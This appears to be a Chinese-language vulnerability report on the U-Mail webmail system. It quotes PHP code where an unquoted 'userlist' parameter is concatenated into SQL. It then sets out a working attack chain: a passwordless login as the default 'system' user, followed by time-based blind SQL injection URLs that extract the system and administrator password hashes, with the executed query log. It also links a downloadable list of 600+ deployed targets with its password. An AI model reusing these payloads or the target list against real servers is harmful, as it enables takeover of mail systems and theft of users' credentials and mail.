1.邮件系统介绍
1)官方下载地址:http://**.**.**.**/html/downloads/
2)版本:最新版V9.8.57
3)测试环境:Windows Server 2003+IIS6.0+官方默认软件
4)使用案例:http://**.**.**.**/html/case/ OR Google "Powered by U-Mail"
漏洞代码 附600多url下载 链接: http://**.**.**.**/s/1nQRzo 密码: ld5k
/fast/oab/module/operates.php
code 区域 if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = trim( $_GET['maillist'] );
if ( $maillist_id )
{
$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );
if ( !$member_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $member_all as $member )
{
if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $member['FullName'],
"pref_email" => $member['Mailbox'],
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );
if ( !$res )
{
dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
}
}
}
}
else
{//不提交maillist,进入
$user_ids = trim( $_GET['userlist'] );
if ( !$user_ids )
{
dump_msg( "param_error", "参数错误!" );
}
$where = "t1.UserID IN (".$user_ids.")";无单引号,产生注入
$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );
$user_all = $arr_tmp['data'];
if ( !$user_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
函数文件
/admin/lib/Mailbox.php代码
code 区域 public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYwÿ = "", $_obfuscate_AedrEgÿÿ = "", $_obfuscate_xvYeh9Iÿ = "", $_obfuscate_tUi30UB0e88ÿ = "", $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ = FALSE, $_obfuscate_ySeUHBwÿ = FALSE )
{
$_obfuscate_AkPSczrCIu40 = intval( $_obfuscate_AkPSczrCIu40 );
$_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";
if ( $_obfuscate_IRFhnYwÿ )
{
$_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYwÿ;//直接拼接where语句,并最终执行sql语句
}
if ( $_obfuscate_xvYeh9Iÿ )
{
if ( $_obfuscate_AedrEgÿÿ )
{
$_obfuscate_mV9HBLYÿ = $_obfuscate_AedrEgÿÿ * $_obfuscate_xvYeh9Iÿ - $_obfuscate_xvYeh9Iÿ;
}
if ( $_obfuscate_mV9HBLYÿ )
{
$_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_mV9HBLYÿ.",".$_obfuscate_xvYeh9Iÿ;
}
else
{
$_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_xvYeh9Iÿ;
}
}
if ( $_obfuscate_tUi30UB0e88ÿ )
{
$_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY ".$_obfuscate_tUi30UB0e88ÿ;
if ( $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ )
{
$_obfuscate_5e2O0TiivW7ec4cÿ .= " DESC";
}
$_obfuscate_5e2O0TiivW7ec4cÿ .= ",t1.FullName ASC";
}
else
{
$_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC";
}
$_obfuscate_mGXfswsMZQÿÿ = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*\r\n\t\t\t\tFROM ".$this->get_table_name( "mailbox" )." as t1, ".$this->get_table_name( "info" )." as t2\r\n\t\t\t\tWHERE ".$_obfuscate_zbtFQY92OYenSG9u."\r\n\t\t\t\t".$_obfuscate_5e2O0TiivW7ec4cÿ;
$_obfuscate_YdwIclUMQÿÿ = $_obfuscate_mGXfswsMZQÿÿ." ".$_obfuscate_UFlHiZJcJu6DQBFE;
if ( $_obfuscate_ySeUHBwÿ )
{
dump( $_obfuscate_YdwIclUMQÿÿ );
}
$_obfuscate_MbMfEtWGUpEscGl = $this->db_count( $_obfuscate_mGXfswsMZQÿÿ );
unset( $_obfuscate_1LzzW8sGEkLaizkÿ );
$_obfuscate_6RYLWQÿÿ = $this->db_select( $_obfuscate_YdwIclUMQÿÿ, "more" );
return array(
"count" => $_obfuscate_MbMfEtWGUpEscGl,
"data" => $_obfuscate_6RYLWQÿÿ
);
}
无需登录的原因是,邮箱系统有system的默认用户,且该文件并未验证用户的密码,只要提交用户名,即认为登录成功,并可进行一系列操作。首先执行
http://**.**.**.**/webmail/fast/index.php?module=operate&action=login 向其post如下数据mailbox=system@**.**.**.**&link=?
如图,登录成功,虽然页面不显示,但所有的函数都可以执行
然后执行,
http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1)
执行的sql语句为
code 区域 150121 20:11:25 2263 Connect umail@localhost on
2263 Query SET NAMES 'UTF8'
2263 Init DB umail
2263 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1))
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
查看响应
然后读取管理员密码,即可对所有用户及邮件操作,管理表为web_usr
exp中不能引入单引号,所以读取admin 和administrator的exp分别为
http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from web_usr where role_code=1),1,1))=97,sleep(5),1)
http://**.**.**.**/webmail/fast/oab/index.php?module=operate&action=save-to-pab&userlist=if(ascii(substr((select password from userlist where role_code=2),1,1))=97,sleep(5),1)